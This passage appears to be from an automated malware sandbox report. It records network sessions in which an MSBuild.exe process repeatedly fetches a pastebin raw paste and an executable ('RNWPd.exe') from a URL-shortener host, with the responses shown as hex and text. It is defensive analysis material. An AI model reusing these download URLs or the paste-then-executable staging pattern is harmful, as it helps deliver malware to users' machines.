6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20
                    Data Ascii: 31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div
                    2024-09-16 19:22:40 UTC160INData Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:22:40 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.649771104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:46 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:46 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433a26f91943e0-EWR
                    2024-09-16 19:22:46 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:22:46 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:22:46 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:22:46 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:22:46 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.649772188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:46 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:22:47 UTC898INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:22:46 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:22:46 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HgJU5OZYrSRjVTPIYJGGMd84i6lBssp8S5e0szreyMKxceeTkzG00penU%2FFlgxTNBNmkfveBvfbDb26TrEJo7ywmglgavwHZPAu3xG%2FkykRVKlPNSISdPt4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433a2b1d9f43ad-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:22:47 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:22:47 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                    Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                    2024-09-16 19:22:47 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                    Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                    2024-09-16 19:22:47 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                    Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                    2024-09-16 19:22:47 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                    Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                    2024-09-16 19:22:47 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                    Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                    2024-09-16 19:22:47 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:22:47 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.649773104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:52 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:52 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433a4e4ef14406-EWR
                    2024-09-16 19:22:52 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:22:52 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:22:52 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:22:52 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:22:52 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.649775188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:53 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:22:53 UTC900INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:22:53 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:22:53 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6PjzVZkoUeBbaItGycROLcZjfHAFXaOps1EFtAFHaoH%2FJsfQkN3U%2BZ7sOaAr2J2rzFCVYfy8biUEL1Fil9VVUNlfzV0y9Vk3%2FQVKly2Uu810V2KeszQSUk%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433a546baa78db-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:22:53 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
